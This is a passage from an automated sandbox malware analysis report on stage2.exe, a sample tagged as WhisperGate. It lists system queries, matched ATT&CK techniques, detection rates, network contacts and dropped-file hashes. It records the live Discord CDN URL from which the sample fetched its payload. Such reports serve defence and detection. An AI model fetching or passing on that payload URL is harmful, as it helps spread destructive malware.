    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Users\user\Desktop\stage2.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 13_2_080D5860 CreateNamedPipeW,
    Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.dr; Binary or memory string: c:\users\user\desktop\procexp.exe
    Source: Amcache.hve.26.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.dr; Binary or memory string: procexp.exe

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | PowerShell (1) | Path Interception | Process Injection (13) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (21) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (21) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (31) | Security Account Manager | Virtualization/Sandbox Evasion (31) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (13) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (4) | SIM Card Swap | Carrier Billing Fraud |
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Remote System Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (1) | Cached Domain Credentials | File and Directory Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing (1) | DCSync | System Information Discovery (12) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
    (Numbers in parentheses are the count of matched signatures for that technique.)

    Behavior Graph


    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    [Behavior graph image not reproduced. Behavior Graph ID: 553986, Sample: stage2.exe, Startdate: 17/01/2022, Architecture: WINDOWS, Score: 72. Root node stage2.exe carries the signatures "Multi AV Scanner detection for submitted file", "Yara detected MSILDownloaderGeneric", ".NET source code contains potential unpacker" and 2 other signatures, plus "Encrypted powershell cmdline option found"; it contacts cdn.discordapp.com (162.159.130.233, port 443, CLOUDFLARENETUS, United States) and starts WerFault.exe (contacts 192.168.2.1; drops C:\ProgramData\Microsoft\...\Report.wer, Little-endian) and two powershell.exe processes, each of which starts conhost.exe.]

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    stage2.exe | 45% | Virustotal | | Browse
    stage2.exe | 49% | ReversingLabs | ByteCode-MSIL.Network.WhisperGate |
    stage2.exe | 100% | Joe Sandbox ML | |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label | Link
    https://watson.telemetry) | 0% | Avira URL Cloud | safe |
    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
    http://crl.microsoft | 0% | URL Reputation | safe |
    https://go.micro | 0% | URL Reputation | safe |
    https://contoso.com/License | 0% | URL Reputation | safe |
    https://contoso.com/Icon | 0% | URL Reputation | safe |
    https://cdn.discordapp.com4 | 0% | URL Reputation | safe |
    https://contoso.com/ | 0% | URL Reputation | safe |
    http://pesterbdd.com/images/Pester.png$ | 0% | Avira URL Cloud | safe |

    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    cdn.discordapp.com | 162.159.130.233 | true | false | | high

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg | false | | high

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    https://watson.telemetry) | WerFault.exe, 0000001A.00000002.478119853.0000000000DAA000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | false | | high
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    http://crl.microsoft | powershell.exe, 0000000D.00000002.432860821.0000000009220000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | false | | high
    https://go.micro | powershell.exe, 00000002.00000002.341684839.0000000005150000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.429277847.0000000004FA7000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
    https://contoso.com/License | powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
    https://contoso.com/Icon | powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    https://github.com/Pester/Pester$ | powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | false | | high
    http://upx.sf.net | Amcache.hve.26.dr | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    https://cdn.discordapp.com | stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    https://github.com/Pester/Pester | powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    https://cdn.discordapp.com4 | stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    http://www.apache.org/licenses/LICENSE-2.0.html$ | powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | false | | high
    http://cdn.discordapp.com | stage2.exe, 00000001.00000000.438989759.000000000337A000.00000004.00000001.sdmp | false | | high
    https://contoso.com/ | powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
    https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | false | | high
    http://pesterbdd.com/images/Pester.png$ | powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.340839036.0000000004DC1000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427485435.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | false | | high

    Contacted IPs

    Public

    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
    162.159.130.233 | cdn.discordapp.com | United States | | 13335 | CLOUDFLARENETUS | false

    Private

    IP
    192.168.2.1

                                                      General Information

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:553986
                                                      Start date:17.01.2022
                                                      Start time:02:23:19
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 44s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:stage2.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of new started processes analysed:28
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal72.troj.evad.winEXE@8/14@1/2
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HDC Information:
                                                      • Successful, ratio: 96.4% (good quality ratio 85.7%)
                                                      • Quality average: 71.6%
                                                      • Quality standard deviation: 34.7%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .exe
                                                      Warnings:
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 13.89.179.12
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                      • Execution Graph export aborted for target stage2.exe, PID 7084 because there are no executed functions
                                                      • Not all processes were analyzed; report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      Time      Type             Description
                                                      02:24:21  API Interceptor  67x Sleep call for process: powershell.exe modified
                                                      02:25:42  API Interceptor  1x Sleep call for process: WerFault.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASN

                                                      No context

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_stage2.exe_71132b2d46f2be7ca5f7ca27edcda1a773a522_f347d55b_0069b9d6\Report.wer
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.213468288928447
                                                      Encrypted:false
                                                      SSDEEP:192:OOGYNnugoHBUZMXmAMaPbFx3iIQ/u7sdS274ItrW:mYNnOBUZMXmAMayIQ/u7sdX4ItrW
                                                      MD5:001C5A8A35F2A1BC8E8B554AAD9D99FB
                                                      SHA1:14FB74DBD5C503FD7CAEE5454006BBC8F5D38A9F
                                                      SHA-256:5B31C7776A10B1EF5250A21468601C317530F710D1825100DFA2344B5397D5AD
                                                      SHA-512:0DA7DC6F44012F114B3A905DA3E7E4DA70BCCF075F4830F10EFA1BB49EDB41445D7E684011569D31EC651BE13414C0558D003C1931A78C930CD51583CB8EBAEF
                                                      Malicious:true
                                                      Reputation:low
                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.8.8.8.7.3.0.7.3.8.2.6.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.8.8.8.7.4.1.3.3.2.0.1.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.b.4.c.0.5.7.-.f.5.c.4.-.4.c.3.b.-.9.f.9.0.-.4.e.0.f.5.3.a.3.7.8.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.a.4.c.1.c.c.-.3.7.f.f.-.4.5.9.4.-.8.e.8.7.-.1.0.0.6.c.0.a.2.e.6.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.t.a.g.e.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.T.b.o.p.b.h...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.c.-.0.0.0.1.-.0.0.1.c.-.0.8.c.a.-.0.0.5.c.8.c.0.b.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.c.2.0.c.f.5.e.9.6.c.6.9.c.0.3.a.3.e.0.a.a.e.0.d.7.e.2.8.e.b.0.0.0.0.0.0.0.0.0.!.0.0.0.0.1.6.5.2.5.c.b.2.f.d.8.6.d.c.e.8.4.2.1.0.7.e.b.1.b.a.6.1.7.4.b.2.3.f.1.8.8.5.3.7.!.s.
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER14DB.tmp.dmp
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Mon Jan 17 10:25:36 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):273022
                                                      Entropy (8bit):3.853179800245628
                                                      Encrypted:false
                                                      SSDEEP:3072:cGlpb60CrUCgU/aDDrs0wTcjd+p+otu9gIOgF5oaIq:cGlwXTjCDDQ00p+79RpD
                                                      MD5:47039F84D9CE3BB540A5FF9C7A61CF31
                                                      SHA1:85474DBDAB51F24FA6D607CC52DC64AAEB7B50B2
                                                      SHA-256:C9804775D078275DF81CF7CFFF3FBACCBD3BD9320912BA0976EFEDCAE3010692
                                                      SHA-512:357F888EDC052948B989FEFD8E8195F80C834D85E4F019887F0D5810AAA3B53691ACA450D4CF66D4DB98EAACF4463904E78E456EA7F2E6A7FC40D774E06737DB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: MDMP....... ....... D.a........................X!..(.......T....*.......'...X..........`.......8...........T............]...............*...........,...................................................................U...........B......X-......GenuineIntelW...........T............C.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER318C.tmp.WERInternalMetadata.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8390
                                                      Entropy (8bit):3.6933539692953867
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNisE6isU6YFfSU6PgmfZjQSnCpr/89bq4sfxDum:RrlsNi36isU6Y9SU6PgmfdQS/qrf1
                                                      MD5:0306EC771A2FC951837BE91CFBF8E011
                                                      SHA1:3A272CDBEA785BE069408708146463007864479B
                                                      SHA-256:8335F027896C9E2A3D22A7B4DEBDD792618D2F87BF1A92B82685CBA121F160E6
                                                      SHA-512:94C083DAA372FE2F7B40155FABCE226B4D09AA8C1BBA7DBAC71574C488B11C03E8F35ED334CB7C11DF4C4D277876631CEC2F52926393233BEB8648D34D522656
                                                      Malicious:false
                                                      Reputation:low
